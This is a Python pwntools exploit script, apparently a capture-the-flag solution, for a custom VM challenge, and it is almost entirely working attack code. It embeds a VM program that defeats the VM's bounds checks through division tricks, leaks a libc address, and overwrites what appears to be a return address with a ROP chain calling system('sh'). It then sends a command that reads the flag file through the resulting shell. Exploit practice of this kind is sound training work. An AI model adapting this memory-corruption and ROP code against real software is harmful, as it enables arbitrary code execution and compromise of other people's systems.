# ROP helper over the target libc (pwntools ROP, presumably; `libc` is defined
# earlier in the file).  Only used below to look up the `pop rdi ; ret` gadget.
rop = ROP(libc)

# Source for the challenge's custom VM.  It is assembled by aasm() below and
# sent to the target as the payload, so everything between the quotes --
# including the `//` notes -- is program text, not Python.  The `{...}`
# fields are filled in from pwntools at Python run time.
#
# Routine map (entry is `jmp start`; operands are written dst, src):
#   write        r0..r3 = 1, 1, 0x2000, 0x1000 then `syscall`.  Never called.
#   range01_0/1  push/pop a constant, then shift it right by 63.  Never
#                called; the same two sequences are inlined at `start`.
#   s1           arithmetic on r10/r11 whose result lands in r12 (and r6).
#                The author's "[0,1] -> 3" / "[0,1] -> 2" notes read as
#                "what the VM's range/bounds analysis believes the register
#                holds -> its real value" -- TODO confirm against the
#                interpreter; the trick only works if that analysis exists.
#   s2           r0 = 8-byte load from [r0 / (1 - 2*r12 + 0x30*r10)]
#                (0xfffffffffffffffe is -2 mod 2**64).  Labelled "leak".
#   s3           8-byte store of r1 to  [r0 / (1 - 2*r12 + 0x30*r10)].
#                By the author's annotations r10 and r12 end up 0, so the
#                divisor is 1 and s2/s3 touch exactly the address passed in;
#                the detour through `div` is presumably what makes the
#                access look bounded to the VM -- confirm.
#   start        1. r10 = 0 >> 63, r11 = 0x8000000000000000 >> 63 (0 and 1
#                   if `shr` is logical), call s1, fold r12 down to 0.
#                2. s2 leaks the qword at VM address 0x60c4; r9 = leak -
#                   0x29d90 is then used as the libc base (every value
#                   written in step 3 is a libc-relative offset added to
#                   r9).  0x29d90 is specific to the target's libc build --
#                   re-derive it if the challenge libc changes.
#                3. s3 overwrites four consecutive qwords at 0x60c4..0x60dc
#                   with: pop rdi ; &"sh" ; ret ; system  -> system("sh").
#                   `pop rdi` is a one-byte opcode, so rop.rdi.address + 1 is
#                   its trailing `ret`; that extra ret realigns the stack to
#                   16 bytes before system(), which otherwise can fault in
#                   SSE code.  The chain starts at the slot the libc pointer
#                   was leaked from, so that slot is presumably a saved
#                   return address reachable through VM memory -- verify.
#                4. `exit` the VM; the chain fires on the way out.
code = f"""
jmp start
write:
load r0, 1
load r1, 1
load r2, 0x2000
load r3, 0x1000
syscall
return
range01_0:
push <8> 0
pop <8> r0
load r1, 63
shr r0, r1
return
range01_1:
push <8> 0x8000000000000000
pop <8> r0
load r1, 63
shr r0, r1
return
s1:
mov r0, r11
load r1, 0
sub r1, r0
load r2, 0xff
mul r1, r2
mov r6, r1
mov r0, r10
load r2, 1
mul r0, r2
shr r6, r0
load r2, 0xffffffffffff
div r6, r2
load r2, 0x8000
div r6, r2
load r2, 1
add r6, r2
mov r12, r6
mov r0, r10
load r2, 2
mul r0, r2
load r2, 0
sub r2, r0
add r6, r2
// r6: [0,1] -> 3
load r2, 1
add r6, r2
load r2, 2
div r6, r2
// r6: [0,1] -> 2
return
s2: // leak [r0]
mov r3, r0
mov r0, r12
load r1, 0xfffffffffffffffe
mul r0, r1
load r1, 1
add r0, r1
load r1, 0x30
mov r2, r10
mul r2, r1
add r0, r2
div r3, r0
load <8> r0, [r3]
return
s3: // [r0] = r1
push <8> r1
mov r3, r0
mov r0, r12
load r1, 0xfffffffffffffffe
mul r0, r1
load r1, 1
add r0, r1
load r1, 0x30
mov r2, r10
mul r2, r1
add r0, r2
div r3, r0
pop <8> r1
store <8> [r3], r1
return
start:
// range 01 -> 0
push <8> 0
pop <8> r0
load r1, 63
shr r0, r1
mov r10, r0
// range 01 -> 1
push <8> 0x8000000000000000
pop <8> r0
load r1, 63
shr r0, r1
mov r11, r0
call s1 // r6: [0,1] -> 2
load r0, 3
sub r0, r12
mov r12, r0
load r0, 2
add r12, r0
load r0, 2
div r12, r0
load r0, 1
sub r12, r0
// r12 -> [1,0] -> 0
load r0, 0x60c4
call s2
mov r9, r0
load r1, 0x29d90
sub r9, r1 // base
load r0, 0x60c4
load r1, {rop.rdi.address} // pop rdi
add r1, r9
call s3
load r0, 0x60cc
load r1, {libc.sym.sh} // sh
add r1, r9
call s3
load r0, 0x60d4
load r1, {rop.rdi.address+1} // ret
add r1, r9
call s3
load r0, 0x60dc
load r1, {libc.sym.system} // system
add r1, r9
call s3
exit
"""
# Assemble to the bytecode the target accepts (aasm() is defined elsewhere);
# exploit() sends len(bcode) first, then bcode itself.
bcode = aasm(code)
print(bcode)  # dump the raw bytecode for inspection
# interpret(bcode)  # disabled: local dry-run of the program
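def exploit(interactive: bool = False, timeout: float = 5.0) -> bool:
    """Deliver the assembled VM program and try to read the flag.

    The target prompts twice (both prompts end in " : "): first for the
    payload length, then for the payload itself.  Once the VM program has run,
    the ROP chain it planted should leave a shell on the connection.  By
    default that shell is driven automatically: a `cat` of the flag is sent
    and its output is read up to the closing "}".

    Previously io.interactive() was always called here, which hands the
    connection to the user and blocks, so the scripted flag read after it was
    effectively unreachable; it is now opt-in.

    Args:
        interactive: drop into an interactive session after sending the
            payload instead of scripting the flag read.
        timeout: seconds to wait for the flag terminator before giving up.

    Returns:
        True after an interactive session or when a "}"-terminated chunk was
        received and printed; False when nothing arrived within `timeout`,
        which usually means the chain did not land a shell.
    """
    with conn() as io:
        io.recvuntil(b" : ")
        io.sendline(str(len(bcode)).encode())
        io.recvuntil(b" : ")
        io.sendline(bcode)
        if interactive:
            io.interactive()
            return True
        # Drain anything the target printed before our command so it is not
        # read as part of the flag.
        io.clean(1)
        io.sendline(b"cat /home/`whoami`/flag*")
        raw = io.recvuntil(b"}", timeout=timeout)
        if not raw:
            # recvuntil yields b"" on timeout: no shell, or no flag file.
            return False
        flag = raw.strip().decode()
        success(flag)
        return True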